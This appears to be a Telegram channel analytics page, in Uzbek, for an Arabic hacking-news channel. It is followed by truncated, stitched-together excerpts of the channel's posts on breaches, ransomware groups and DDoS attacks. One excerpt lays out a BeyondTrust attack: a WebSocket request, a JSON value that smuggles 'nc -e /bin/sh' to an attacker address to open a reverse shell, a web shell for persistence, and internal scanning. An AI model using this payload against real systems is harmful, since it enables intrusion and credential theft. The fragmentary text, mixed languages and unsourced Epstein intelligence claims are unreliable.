Hacker News
المصدر العربي الأول لأخبار الهاكرز و ملتقى الأحرار و المناضلين صفحتنا الأولى https://www.facebook.com/HackerNews2
Ko'proq ko'rsatish📈 Telegram kanali Hacker News analitikasi
Hacker News (@hackernewsar) Arab til segmentidagi kanali faol ishtirokchi. Hozirda hamjamiyat 13 295 obunachidan iborat bo'lib, Texnologiyalar & Aralashmalar toifasida 9 603-o'rinni va Saudiya Arabistoni mintaqasida 5 757-o'rinni egallagan.
📊 Auditoriya ko‘rsatkichlari va dinamika
невідомо sanasidan buyon loyiha tez o‘sib, 13 295 obunachiga ega bo‘ldi.
24 Iyun, 2026 dagi oxirgi ma’lumotlarga ko‘ra kanal barqaror faollikka ega. Oxirgi 30 kunda obunachilar soni 3 ga, so‘nggi 24 soatda esa 6 ga o‘zgardi va umumiy qamrov yuqori darajada qolmoqda.
- Tasdiqlash holati: Tasdiqlanmagan
- Jalb etish (ER): Auditoriya o‘rtacha 15.87% darajada jalb etiladi. Nashrdan keyingi dastlabki 24 soatda kontent odatda umumiy obunachilar sonining 5.13% ini tashkil etuvchi reaksiyalarni to‘playdi.
- Post qamrovi: Har bir post o‘rtacha 2 110 marta ko‘riladi; birinchi sutkada odatda 682 ta ko‘rish yig‘iladi.
- Reaksiyalar va o‘zaro ta’sir: Auditoriya faol: har bir postga o‘rtacha 21 ta reaksiya keladi.
- Tematik yo‘nalishlar: Kontent نِظَام, شَرِكَة, اِختِرَاق, مَجمُوعَة, بَيَان kabi asosiy mavzularga jamlangan.
📝 Tavsif va kontent siyosati
Muallif resursni shaxsiy fikrni ifoda etish maydoni sifatida ta’riflaydi:
“المصدر العربي الأول لأخبار الهاكرز و ملتقى الأحرار و المناضلين
صفحتنا الأولى https://www.facebook.com/HackerNews2”
Yuqori yangilanish chastotasi (oxirgi ma’lumot 25 Iyun, 2026 da olingan) sababli kanal doimo dolzarb va katta qamrovli bo‘lib qoladi. Analitika auditoriya kontent bilan faol hamkorlik qilishini, uni Texnologiyalar & Aralashmalar toifasidagi muhim ta’sir nuqtasiga aylantirishini ko‘rsatadi.
وأعرب رئيس الوزراء النيوزيلندي كريستوفر لوكسون عن قلقه البالغ حيال الحادثة، داعياً إلى تشديد قوانين الأمن السيبراني في البلاد، وأكدت السلطات الصحية في نيوزيلندا والشرطة أن الأولوية القصوى حالياً هي سلامة المرضى والتحقق من صحة البيانات قبل إعادة تشغيل النظام.#HackerNews #MediMap #CharlieKirk
ملاحظة: يمتلك دونالد ترامب منتجع وفندق فاخر (5 نجوم) يضم أجنحة وشققاً فندقية في لاس فيغاس.#HackerNews #ShinyHunters
* سبب الاختیار: أنظمة BeyondTrust ھي "بنوك كلمات مرور". الحصول على صلاحیة RCE یعني إمكانیة فك تشفیر كلمات المرور المخزنة والوصول إلى بقیة خوادم الشركة دون إثارة أي إنذار.3 سيناريو التخفي والبقاء (Persistence via Web Shell): یھدف المھاجم ھنا لضمان العودة للجھاز حتى لو قامت الشركة بإعادة تشغیله أو تغییر كلمات المرور. - الأدوات المستخدمة: بوابة خلفیة بسیطة (Web Shell) مكتوبة بـ PHP أو Python. - آلیة العمل: یرسل المھاجم أمراً عبر الـ WebSocket یقوم بإنشاء ملف جدید في مسار الویب الخاص بالمنصة مثلاً : /usr/share/web/shell.php یحتوي ھذا الملف على سطر برمجي واحد یسمح للمھاجم بإرسال أوامر عبر المتصفح مباشرة.
* سبب الاختیار: الـ Shell Web یمنح المھاجم "رابطاً سریاً" خاصاً به. حتى لو أغلق المھاجم اتصال الـ WebSocket الأول، یمكنه العودة في أي وقت عبر طلب HTTP بسیط للمسار الذي أنشأه.4 سیناریو "الاستطلاع الداخلي" (Internal Scanning) : استخدام جھاز BeyondTrust كـ "قفزة" للھجوم على الشبكة الداخلیة التي لا تظھر على الإنترنت. - الأدوات المستخدمة: Nmap أو سكربتات Bash مخصصة للمسح. - آلیة العمل: یقوم المھاجم بتحمیل أداة Nmap على جھاز BeyondTrust المخترق، ثم یأمره بمسح الأجھزة المجاورة له في الشبكة المحلیة (مثل أجھزة المدیر المالي أو خوادم البیانات).
* سبب الاختیار: جھاز BeyondTrust موثوق به داخل الشبكة، فعملیات المسح القادمة منه لن تبدو مشبوھة لأنظمة الأمان الداخلیة وليس كما لو كانت قادمة من عنوان IP خارجي.#HackerNews #BeyondTrust
* سبب الاختیار: لأن الـ Reverse Shell یجعل جھاز الضحیة ھو من "یتصل" بالمھاجم، وھو ما تسمح بھ معظم جدران الحمایة (Outbound Traffic)، مما یضمن للمھاجم بقاء الاتصال مستقراً لفترة طویلة.#HackerNews #BeyondTrust
GET /nw HTTP/1.1 Host: [Target_IP] Upgrade: websocket Connection: Upgrade Sec-WebSocket-Key: [Random_Key] Sec-WebSocket-Version: 13بمجرد رد الخادم بـ Protocols Switching 101 ، یصبح الطریق مفتوحاً لإرسال "الحمولات" (Payloads) مباشرة إلى المعالج الداخلي دون قیود HTTP التقلیدیة. إرسال الحمولة (بعد الترقیة): بعد نجاح الترقیة، یرسل المھاجم رسالة بصیغة JSON عبر قناة الـ WebSocket المفتوحة:
{"remoteVersion": "$(nc -e /bin/sh [Attacker_IP] [Port])"}
ھنا یظن النظام أنه یستلم "رقم إصدار"، لكن بسبب استخدام Evaluation Arithmetic Bash بشكل غیر آمن، یقوم النظام بتنفیذ الأمر الموجود بین القوسین (...)$ فورا،ً مما یعطي المھاجم "صلاحیة الوصول الكاملة" (Shell Reverse) BeyondTrust Release Notes .
#HackerNews
#BeyondTrustوشملت البيانات المسروقة: -بيانات العملاء: هويات الشركات التي تتعامل معها، العقود، والأرقام الضريبية. -التقارير المالية: ميزانيات الشركات، كشوفات الرواتب، والحسابات البنكية. -أسرار تجارية: استشارات قانونية ومالية حساسة.تستخدم مجموعة الهاكرز Tengu أسلوب "الابتزاز المزدوج" حيث تقوم بتشفير الملفات مما يجعل من المستحيل فتحها، وتطلب "فدية" مالية بالعملات الرقمية مقابل عدم نشر هذه البيانات. استهدفت مجموعة Tengu منذ ظهورها لأول مرة في 21 أكتوبر 2025 أكثر من 43 ضحية حول العالم، تركز بشكل كبير على قطاعات التصنيع، التكنولوجيا، الخدمات اللوجستية، والمحاسبة. #HackerNews #Tengu #DarkWeb
-بيانات الحساب: أرقام الحسابات الدولية (IBAN/RIB) -نوع الحسابات (جاري، ادخار، أوراق مالية) واسم البنك. -بيانات صاحب الحساب: الاسم الكامل، تاريخ ومكان الميلاد، والعنوان. -الحالات: تواريخ فتح الحساب أو إغلاقه أو تعديله. -الأرقام الضريبية.وصفت وزارة الاقتصاد والمديرية العامة للمالية العامة (DGFiP) المنفذ بأنه "طرف خبيث" (Malicious actor) استخدم هويات رقمية مسروقة تخص أحد الموظفين الحكوميين للوصول إلى النظام. وبدأت الوزارة بإبلاغ الأشخاص المتضررين بشكل شخصي، وتم تقديم شكوى جنائية وإبلاغ هيئة حماية البيانات الفرنسية (CNIL). #HackerNews
تتعلق الثغرة بأنظمة المؤسسات (Enterprise Systems) الضخمة، وليست أجهزة استهلاكية (مثل اللاب توب). تستهدف البنية التحتية لمراكز البيانات (Data Centers).#HackerNews #CVE_2026_22769 #رمضان_مبارك
وجه المسؤولون في كييف أصابع الاتهام إلى مجموعات مرتبطة بروسيا أو مجموعات تعمل لصالحها، في هجمات مماثلة سابقة وقعت في فبراير، نُسبت العمليات لمجموعات مثل "NoName057(16)"، وهي مجموعة تنشط في تنفيذ هجمات حجب الخدمة (DDoS).#HackerNews
تشير التقديرات الأولية إلى وصول المهاجمين إلى بيانات شخصية للعملاء تشمل الأسماء، وأرقام الهواتف، والبريد الإلكتروني، وعناوين الشحن، و تم إيقاف المتجر مؤقتاً لإجراء التحقيقات وتقييم الأضرار الناتجة عن هذا النوع من الهجمات المعروف بـ "هجوم سلاسل التوريد".فيما واجه بنك "A-Bank" إلى جانب بنوك ومؤسسات مالية أخرى هجمات من نوع "حجب الخدمة الموزعة" (DDoS)، مما أدى إلى تعطل مؤقت في خدمات الدفع عبر الإنترنت، وتطبيقات الهاتف المحمول، وعمليات السحب من أجهزة الصراف الآلي. #HackerNews
مجموعة The Gentlemen هي مجموعة برمجيات فدية ظهرت بنشاط متزايد منذ أواخر عام 2025، وتستخدم تقنيات متطورة مثل استغلال برامج تشغيل ويندوز (Windows drivers) والتلاعب بسياسات المجموعات (GPO) لتجاوز الدفاعات الأمنية. سجلت المجموعة 128 ضحية حول العالم حتى أوائل فبراير 2026.يأتي هذا الهجوم تزامناً مع إعلان مجلس الأمن السيبراني لحكومة الإمارات في 18 فبراير 2026 عن آلاف محاولات الاختراق يومياً، مشيراً إلى أن قطاعي النقل والخدمات المالية هما من بين الأكثر استهدافاً منذ بداية العام. #HackerNews #TheGentlemen
أمضى موقع Drop Site News الأشهر الماضية في كشف صلات إبستين بالمخابرات الأمريكية والإسر*ائيلية. و بالتعاون مع موقع Jmail لجعل ملفات إبستين الكاملة متاحة وقابلة للبحث.#HackerNews #DropSiteNews #Jmail #EPSTEIN
وسعى إبستين من خلال المشروع إلى تطوير أدوات استخباراتية جديدة تهدف إلى "اعتراض" وفهم الاتصالات والرسائل المتبادلة بين الخلايا الحية داخل الكائنات الحية.#HackerNews #DropSiteNews #Jmail #EPSTEIN
Endi mavjud! Telegram Tadqiqoti 2025 — yilning asosiy insaytlari 
